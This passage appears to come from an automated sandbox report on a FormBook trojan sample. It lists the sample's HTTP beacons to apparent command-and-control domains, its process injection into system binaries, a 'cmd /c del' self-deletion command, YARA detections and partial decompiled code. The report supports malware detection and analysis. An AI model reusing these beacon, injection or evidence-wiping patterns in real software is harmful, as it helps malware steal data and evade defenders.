Jun 10, 2021 17:00:02.214797020 CEST | 8.8.8.8 | 192.168.2.4 | 0xd155 | No error (0) | www.stealthshop.net | - | 74.220.199.6 | A (IP address) | IN (0x0001)

                                                                                    HTTP Request Dependency Graph

                                                                                    • www.granthamrobotics.com
                                                                                    • www.mclpay.com

                                                                                    HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49766 | 34.102.136.180 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 10, 2021 16:59:51.470333099 CEST | 5054 | OUT | GET /sadn/?5jDxn=9rYPWNexEp&9r8=cvOZMLUYKOYUB2MIVs3brF1aeCykDgyLTnisf2vSTBUNQvDIkJgvRwpKMlOnwLgVr/YP HTTP/1.1
                                                                                    Host: www.granthamrobotics.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
Jun 10, 2021 16:59:51.608155966 CEST | 5055 | IN | HTTP/1.1 403 Forbidden
                                                                                    Server: openresty
                                                                                    Date: Thu, 10 Jun 2021 14:59:51 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 275
                                                                                    ETag: "60ba413e-113"
                                                                                    Via: 1.1 google
                                                                                    Connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49767 | 13.59.53.244 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Jun 10, 2021 16:59:56.918880939 CEST | 5056 | OUT | GET /sadn/?9r8=DXfJxxxI+/4CaoDoAzC1V5G6SJQKNuW4mru3KXZlF9SJY6Uq4c9wctugrHKIzz2k7BKt&5jDxn=9rYPWNexEp HTTP/1.1
                                                                                    Host: www.mclpay.com
                                                                                    Connection: close
                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                    Data Ascii:
Jun 10, 2021 16:59:57.059190989 CEST | 5056 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 10 Jun 2021 14:59:57 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 153
                                                                                    Connection: close
                                                                                    Server: nginx/1.16.1
                                                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                    System Behavior

                                                                                    General

                                                                                    Start time:16:57:55
                                                                                    Start date:10/06/2021
                                                                                    Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Packed2.43183.29557.exe'
                                                                                    Imagebase:0x3a0000
                                                                                    File size:557568 bytes
                                                                                    MD5 hash:4E9095CEADD56BC68A99947AB929F691
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:.Net C# or VB.NET
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.737256043.00000000037CC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.737458183.0000000003817000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.738166081.00000000038E0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:low

                                                                                    General

                                                                                    Start time:16:58:37
                                                                                    Start date:10/06/2021
                                                                                    Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                    Imagebase:0xcd0000
                                                                                    File size:42080 bytes
                                                                                    MD5 hash:F2A47587431C466535F3C3D3427724BE
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.803111095.0000000001290000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.801838633.0000000001180000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.725117231.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Antivirus matches:
                                                                                    • Detection: 0%, Metadefender, Browse
                                                                                    • Detection: 0%, ReversingLabs
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:16:58:42
                                                                                    Start date:10/06/2021
                                                                                    Path:C:\Windows\explorer.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:
                                                                                    Imagebase:0x7ff6fee60000
                                                                                    File size:3933184 bytes
                                                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:16:59:10
                                                                                    Start date:10/06/2021
                                                                                    Path:C:\Windows\SysWOW64\systray.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\systray.exe
                                                                                    Imagebase:0x1c0000
                                                                                    File size:9728 bytes
                                                                                    MD5 hash:1373D481BE4C8A6E5F5030D2FB0A0C68
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.900861159.0000000002CC0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.900522638.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                    Reputation:moderate

                                                                                    General

                                                                                    Start time:16:59:15
                                                                                    Start date:10/06/2021
                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                                    Imagebase:0x11d0000
                                                                                    File size:232960 bytes
                                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:16:59:15
                                                                                    Start date:10/06/2021
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff724c50000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    Disassembly

                                                                                    Code Analysis

                                                                                      Executed Functions

                                                                                      APIs
                                                                                      • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,06629925,?,?,?), ref: 06629BCC
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true
                                                                                      • Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: CreateProcessUser
                                                                                      • String ID:
                                                                                      • API String ID: 2217836671-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 06620C49
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true
                                                                                      • Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: CopyFile
                                                                                      • String ID:
                                                                                      • API String ID: 1304948518-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(00000000,?,?,?), ref: 0662791F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true
                                                                                      • Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 06623277
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true
                                                                                      • Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      • Opcode ID: 6fa7e5e9c545536f51fa9400320eb86713136e49a24c08a5d39b03eaff50ea69
                                                                                      • Instruction ID: 8d0279e4d43942fdb978738697aa3e28a971017cd6274194443b9416dc8dbaab
                                                                                      • Opcode Fuzzy Hash: 6fa7e5e9c545536f51fa9400320eb86713136e49a24c08a5d39b03eaff50ea69
                                                                                      • Instruction Fuzzy Hash: 7C11C132B0487487DB34AA7AC8503AAF2AAEB86620F158167E926D7290D634DE49C251
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2d7dc319061fa6f536f96bd4fb8208b128e76b6de2e46878adb4cf866cf09eb9
                                                                                      • Instruction ID: b6f26d5a99ced74475400a137a405e873235eed81c4d38f6366ff1ca2c7f02aa
                                                                                      • Opcode Fuzzy Hash: 2d7dc319061fa6f536f96bd4fb8208b128e76b6de2e46878adb4cf866cf09eb9
                                                                                      • Instruction Fuzzy Hash: 8911C036B08175C7DB108A6D9C007BBF2A7EBC4B14F15813BD517E7B80D6788988C35A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db3cc755e6995c4338e889ad192b1f7332074281e65d626b48a86e6735ba9cd8
                                                                                      • Instruction ID: 3647d3bab7aa2f52a9871c60731486e5f1385c975626a5e11a356bc4b9d29c25
                                                                                      • Opcode Fuzzy Hash: db3cc755e6995c4338e889ad192b1f7332074281e65d626b48a86e6735ba9cd8
                                                                                      • Instruction Fuzzy Hash: 85118472E0C036CBD7809A6BD8007BBB2AADB85260F084537E5D6F7240D634BA59C393
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731468437.0000000000E7D000.00000040.00000001.sdmp, Offset: 00E7D000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 01dc1dd5c076053dd37dabc6258269e540eab889bad8b17572ae422b602e1322
                                                                                      • Instruction ID: fcbead5b92cf3357321367d0ccc50200f6d829c1f967b62551c35f5806859ad4
                                                                                      • Opcode Fuzzy Hash: 01dc1dd5c076053dd37dabc6258269e540eab889bad8b17572ae422b602e1322
                                                                                      • Instruction Fuzzy Hash: E411B176408280DFCB11CF10D9C4B16BF71FF94328F24C6A9D8495B616C33AE856CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 27ba634f093104b6c1f2f42b6c278baa379f1d7232881e1cfcd7080a944ac0fe
                                                                                      • Instruction ID: 7b60aed4da2ce50fe753beefb4bc2edb71339b1a9f212bf8ba5843bfbd8a644b
                                                                                      • Opcode Fuzzy Hash: 27ba634f093104b6c1f2f42b6c278baa379f1d7232881e1cfcd7080a944ac0fe
                                                                                      • Instruction Fuzzy Hash: E001B531B1C1758BD724AEA9C850FBBB2B5EB89215F404136D206E7780D6748D5CC2DA
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 04ed13e453c7ae6697189ea8abcad6d70d99ab38064317176558ce72f3ac245f
                                                                                      • Instruction ID: 074b1a2f2ce968c68d3f095e50955caf0c01b0ec806bc5998eb4efabfe4a5ff2
                                                                                      • Opcode Fuzzy Hash: 04ed13e453c7ae6697189ea8abcad6d70d99ab38064317176558ce72f3ac245f
                                                                                      • Instruction Fuzzy Hash: B911172190F3C49FC7039B709C665997F709E17104B5E85EBD484DB1A3E229495DCBA2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731468437.0000000000E7D000.00000040.00000001.sdmp, Offset: 00E7D000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 41a192497c38020f491ce4973ea639da9fb2a261505e09517a2130f0f479f048
                                                                                      • Instruction ID: 4fd271d22a07e67e7405c5db74f07422e98b2db9df79080539f0f8485c157716
                                                                                      • Opcode Fuzzy Hash: 41a192497c38020f491ce4973ea639da9fb2a261505e09517a2130f0f479f048
                                                                                      • Instruction Fuzzy Hash: A601F77140C340AAF7144E26DCC47A6BBA8DF42378F18C15AEA0D6B286C378A844C6B2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ace86c8f38266da7a4185b57978d9bd3113735f393b388cf08552d0e96aa9997
                                                                                      • Instruction ID: 4720e9782834be255cc068fc54c7ae24d4640e6a87976ad6c705a102aa1437bd
                                                                                      • Opcode Fuzzy Hash: ace86c8f38266da7a4185b57978d9bd3113735f393b388cf08552d0e96aa9997
                                                                                      • Instruction Fuzzy Hash: D701AF38A04164CBEB142A68D40937E7269E740305F40843BE546F6281DB3DC99ADA62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e11b9287d63fe0b5aa9fe2ef345ab946c94ebbb3f2d6a5caee297ce3bddd8b37
                                                                                      • Instruction ID: 3738170712601705f31c32016c9d965a86a693e9aaa6ce80a96c29bc7da59c88
                                                                                      • Opcode Fuzzy Hash: e11b9287d63fe0b5aa9fe2ef345ab946c94ebbb3f2d6a5caee297ce3bddd8b37
                                                                                      • Instruction Fuzzy Hash: DFF0F031B44210ABEB0132799C1ABAF368EDBC5700F004876E103EB3C1CE799E0547A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1f1f39d1cbf7499abc79c210fba100cc1bd1b8aff8e5f982111cf4fbebb1ae0c
                                                                                      • Instruction ID: 121f810a903e564426f713264ec05e8b73d55cdb4773625ebd70f9407e3ed424
                                                                                      • Opcode Fuzzy Hash: 1f1f39d1cbf7499abc79c210fba100cc1bd1b8aff8e5f982111cf4fbebb1ae0c
                                                                                      • Instruction Fuzzy Hash: 3501AF70F40274DBEB109A989909AAF767AEB01B10F15C876E507E7380D7788E09CBD6
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 98f8e6338beadc8b03872f5f9c558e1eeae13f3618c40dbb3b16102aaa3335c9
                                                                                      • Instruction ID: ae8e6767eda32603671a1274be5aacbf9a06c613b1bc28ee19df1259b1b98ac5
                                                                                      • Opcode Fuzzy Hash: 98f8e6338beadc8b03872f5f9c558e1eeae13f3618c40dbb3b16102aaa3335c9
                                                                                      • Instruction Fuzzy Hash: D5011E70D0420DEFEB80EFE4D4506AEBBF6EF44304F20C5AAD115AB265EB705A009F81
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: af96fd08bf0eb5e311db595fb0669fce775bb2e1bc314625a3a9b3b8423a02aa
                                                                                      • Instruction ID: 7c1dea90f1a7cfc60e8b52c4532a136a0be2317e9d589b61ce65f54547d8e996
                                                                                      • Opcode Fuzzy Hash: af96fd08bf0eb5e311db595fb0669fce775bb2e1bc314625a3a9b3b8423a02aa
                                                                                      • Instruction Fuzzy Hash: 99014F3CA48250CBEB146B64D51A3BD7269E780305F40443BE107E62C1DB3CCD8ADF21
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731468437.0000000000E7D000.00000040.00000001.sdmp, Offset: 00E7D000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 10171cc3fd429aa502e872721415c9488c976504733a0e0ed94bd3b5d90d2fc3
                                                                                      • Instruction ID: 693389ed6c75205487c172f0ee9fd58308990a23d64b9cb9b3bc6e5249f333b7
                                                                                      • Opcode Fuzzy Hash: 10171cc3fd429aa502e872721415c9488c976504733a0e0ed94bd3b5d90d2fc3
                                                                                      • Instruction Fuzzy Hash: 86F06871408244AAF7148E16DCC4762FFA8DF51778F18C55AED085B286C3799C44CA71
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f0f7023a39b6e870e34294c57f6f4c203ac6dc23d16533c04c213dbe49f77101
                                                                                      • Instruction ID: 77de60a41a002c14e93a305e40ddb75148dfe67d367163c1a8bacd0b39843b93
                                                                                      • Opcode Fuzzy Hash: f0f7023a39b6e870e34294c57f6f4c203ac6dc23d16533c04c213dbe49f77101
                                                                                      • Instruction Fuzzy Hash: 26F0C8796081A1CBE7142768D4053BD3B29D742314F044177F097E72C2CB2DC58EDB12
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a9e960f1b00e6edc047b39834a36cda7d9bd0f257c3ee062c2e7fc443fcbebc3
                                                                                      • Instruction ID: 5698307cdb882d3d6ae2a55d0ab3c27b9b766eed7d46493ae80ce982e379508b
                                                                                      • Opcode Fuzzy Hash: a9e960f1b00e6edc047b39834a36cda7d9bd0f257c3ee062c2e7fc443fcbebc3
                                                                                      • Instruction Fuzzy Hash: 93013C3490E3C4AFC743DB74DC15999BFB0AF07214B1981DBD888DB2A3D2395A19CB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f685ad3f48cfaebf92588589fbf468b9c422dd0c0af2daf6a1b6f4828cf6350f
                                                                                      • Instruction ID: 8fd8f1f1639a6f0d5bf162048819b25b519702cb2df81af9585dc91ae47f26ef
                                                                                      • Opcode Fuzzy Hash: f685ad3f48cfaebf92588589fbf468b9c422dd0c0af2daf6a1b6f4828cf6350f
                                                                                      • Instruction Fuzzy Hash: CEF04F7490E388AFC707DBB4981165DBFB0AF46204F1681EBC884DB293D7385958DB62
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740661003.0000000006540000.00000040.00000001.sdmp, Offset: 06540000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b552235cd3796b21e0a15b6d7f74f38d6def79d913cbb3e6efafb78dd3946534
                                                                                      • Instruction ID: 1dac73b67301e5d797fdfc1852d50e209fe712140c94ea758647ae36dfcd0c62
                                                                                      • Opcode Fuzzy Hash: b552235cd3796b21e0a15b6d7f74f38d6def79d913cbb3e6efafb78dd3946534
                                                                                      • Instruction Fuzzy Hash: 05F0493490E384EFCB42DB74D855AA9BFB0EF4A204B1582DBD484DB2A2D2344A49CF52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 051bcd4e7d6fb8e211f6e5099b9d5c4459aac1038674f410753618fa9e2aef4c
                                                                                      • Instruction ID: bb7d669101c380389392c75bf539db2f1edf64f4c361ac3dee80a7c8193c44d7
                                                                                      • Opcode Fuzzy Hash: 051bcd4e7d6fb8e211f6e5099b9d5c4459aac1038674f410753618fa9e2aef4c
                                                                                      • Instruction Fuzzy Hash: 80F024729082989FF701CBA0C8506AE3F71EB46244B4481CBD1019F6A2E6349601C740
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%


                                                                                      Non-executed Functions

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp, Offset: 06610000, based on PE: true
                                                                                      • Associated: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp, Offset: 06610000, based on PE: true
                                                                                      • Associated: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.731592097.0000000002720000.00000040.00000001.sdmp, Offset: 02720000, based on PE: false
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.740766429.0000000006620000.00000040.00000001.sdmp, Offset: 06610000, based on PE: true
                                                                                      • Associated: 00000001.00000002.740750882.0000000006610000.00000004.00000001.sdmp
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Executed Functions

                                                                                      APIs
                                                                                      • NtReadFile.NTDLL(B=A,5E972F59,FFFFFFFF,00413A01,?,?,B=A,?,00413A01,FFFFFFFF,5E972F59,00413D42,?,00000000), ref: 004182A5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.801642119.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: FileRead
                                                                                      • String ID: B=A$B=A
                                                                                      • API String ID: 2738559852-2767357659
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 37%
                                                                                      			E00418260(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                      				void* _t18;
                                                                                      				void* _t27;
                                                                                      				intOrPtr* _t28;
                                                                                      
                                                                                      				_t3 = _a4 + 0xc48; // 0xc48
                                                                                      				_t28 = _t3;
                                                                                      				E00418DB0(_t27, _a4, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
